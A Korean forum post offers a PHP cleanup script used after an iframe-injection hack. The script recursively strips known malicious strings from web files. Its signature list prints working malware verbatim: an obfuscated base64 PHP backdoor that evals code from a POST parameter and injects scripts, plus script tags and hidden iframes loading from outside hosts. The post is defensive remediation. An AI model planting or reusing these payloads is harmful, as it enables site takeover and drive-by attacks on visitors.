HACKING



크게 작게 인쇄

iframe hacking 당한 후에 사용한 치료용 스크립트

실행한 디렉토리부터 하위단에 있는 모든 파일을 다 뒤져서 감염된 파일을


수정하는 방식으로 되어 있다.


<?php
//usage : php -f kickHack.php @infected directory root



$hackArr = array(
 '<?php eval(base64_decode(\'aWYoIWZ1bmN0aW9uX2V4aXN0cygndnIxJykpe2Z1bmN0aW9uIHZyMSgkcyl7aWYocHJlZ19tYXRjaF9hbGwoJyM8c2NyaXB0KC4qPyk8L3NjcmlwdD4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdYXMkdilpZihjb3VudChleHBsb2RlKCJcbiIsJHYpKT41KXskZT1wcmVnX21hdGNoKCcjW1wnIl1bXlxzXCciXC4sO1w/IVxbXF06Lzw+XChcKV17MzAsfSMnLCR2KXx8cHJlZ19tYXRjaCgnI1tcKFxbXShccypcZCssKXsyMCx9IycsJHYpO2lmKChwcmVnX21hdGNoKCcjXGJldmFsXGIjJywkdikmJigkZXx8c3RycG9zKCR2LCdmcm9tQ2hhckNvZGUnKSkpfHwoJGUmJnN0cnBvcygkdiwnZG9jdW1lbnQud3JpdGUnKSkpJHM9c3RyX3JlcGxhY2UoJHYsJycsJHMpO31pZihwcmVnX21hdGNoX2FsbCgnIzxpZnJhbWUgKFtePl0qPylzcmM9W1wnIl0/KGh0dHA6KT8vLyhbXj5dKj8pPiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF1hcyR2KWlmKHByZWdfbWF0Y2goJyNbXC4gXXdpZHRoXHMqPVxzKltcJyJdPzAqWzAtOV1bXCciPiBdfGRpc3BsYXlccyo6XHMqbm9uZSNpJywkdikmJiFzdHJzdHIoJHYsJz8nLic+JykpJHM9cHJlZ19yZXBsYWNlKCcjJy5wcmVnX3F1b3RlKCR2LCcjJykuJy4qPzwvaWZyYW1lPiNpcycsJycsJHMpOyRzPXN0cl9yZXBsYWNlKCRhPWJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZENCemNtTTlhSFIwY0RvdkwzcGhhVzU1Y205NExtTnZiUzlmY0hKcGRtRjBaUzlvWldGa1pYSXVjR2h3SUQ0OEwzTmpjbWx3ZEQ0PScpLCcnLCRzKTtpZihzdHJpc3RyKCRzLCc8Ym9keScpKSRzPXByZWdfcmVwbGFjZSgnIyhccyo8Ym9keSkjbWknLCRhLidcMScsJHMsMSk7ZWxzZWlmKHN0cnBvcygkcywnPGEnKSkkcz0kYS4kcztyZXR1cm4kczt9ZnVuY3Rpb24gdnIxMigkYSwkYiwkYywkZCl7Z2xvYmFsJHZyMTE7JHM9YXJyYXkoKTtpZihmdW5jdGlvbl9leGlzdHMoJHZyMTEpKWNhbGxfdXNlcl9mdW5jKCR2cjExLCRhLCRiLCRjLCRkKTtmb3JlYWNoKEBvYl9nZXRfc3RhdHVzKDEpYXMkdilpZigoJGE9JHZbJ25hbWUnXSk9PSd2cjEnKXJldHVybjtlbHNlaWYoJGE9PSdvYl9nemhhbmRsZXInKWJyZWFrO2Vsc2Ukc1tdPWFycmF5KCRhPT0nZGVmYXVsdCBvdXRwdXQgaGFuZGxlcic/ZmFsc2U6JGEpO2ZvcigkaT1jb3VudCgkcyktMTskaT49MDskaS0tKXskc1skaV1bMV09b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7fW9iX3N0YXJ0KCd2cjEnKTtmb3IoJGk9MDskaTxjb3VudCgkcyk7JGkrKyl7b2Jfc3RhcnQoJHNbJGldWzBdKTtlY2hvICRzWyRpXVsxXTt9fX0kdnIxbD0oKCRhPUBzZXRfZXJyb3JfaGFuZGxlcigndnIxMicpKSE9J3ZyMTInKT8kYTowO2V2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpOw==\')); ?>',
 'document.write(\'<script src=http://zainyrox.com/_private/header.php ><\/script>\');',
 '<script src=http://zainyrox.com/_private/header.php ></script>',
 '<iframe frameborder="0" onload="if (!this.src){ this.src=\'http://superkahn.ru:8080/index.php\'; this.height=\'0\'; this.width=\'0\';}" >fspcmsjgtslisadhstuqkmwehtuenjt</iframe>',
 '<div style="display:none">kagigwwmmrjjjyrfqapcnzywvzeuijp<iframe width=127 height=336 src="http://icq-tel.ru:8080/index.php" ></iframe></div>'
);



$startDIR = $_SERVER['PWD'];


$self = $startDIR.'/'.$_SERVER['PHP_SELF'];


function healFile($dir){
 global $hackArr,$self;
 $matchcnt = 0;
 $files = scandir($dir);
 while ( $files ) {
  $popname = array_pop($files);
  $theFile = $dir.'/'.$popname;
  if ( is_dir($theFile) && !in_array($popname,array('.','..')) ){
   healFile($theFile);
  } else if ( $self == $theFile ){
  } else if( in_array(substr($popname,-4),array('.htm','.php','.inc')) || substr($popname,-5) == '.html' || substr($popname,-3) == '.js' ){
   $cont = file_get_contents($theFile);
   $res = str_replace($hackArr,'',$cont,$cnt);
   if ( $cnt > 0 ){
    $matchcnt++;
    file_put_contents($theFile,$res);
   }
  }
 }
 if ( $matchcnt > 0 ){
  echo $dir.' '.$matchcnt." found\n";
 }
}
healFile($startDIR);


?>

코멘트 0
해킹방어 | 전체게시물 119
안내

포인트안내닫기

  • 글읽기0
  • 글쓰기0
  • 댓글쓰기0
  • 다운로드0
해킹방어리스트
번호 제목 등록일 조회
119 텍스트 04-28 5567
118 텍스트 09-17 10494
117 텍스트 09-17 6852
116 텍스트 09-17 6759
115 텍스트 09-17 7356
114 텍스트 03-26 7882
113 텍스트 02-15 15957
112 텍스트 02-15 7081
111 텍스트 12-28 8590
110 텍스트 12-27 10992
109 텍스트
iframe hacking 당한 후에 사용한 치료용 스크립트
11-25 7394
108 텍스트 11-28 6646
107 텍스트 11-28 7713
106 텍스트 10-29 9925
105 텍스트 10-14 6632
104 텍스트 09-18 7911
103 텍스트 03-05 13853
102 텍스트 09-25 8566
101 텍스트 09-25 48479
100 텍스트 09-25 15703
 맨앞이전123456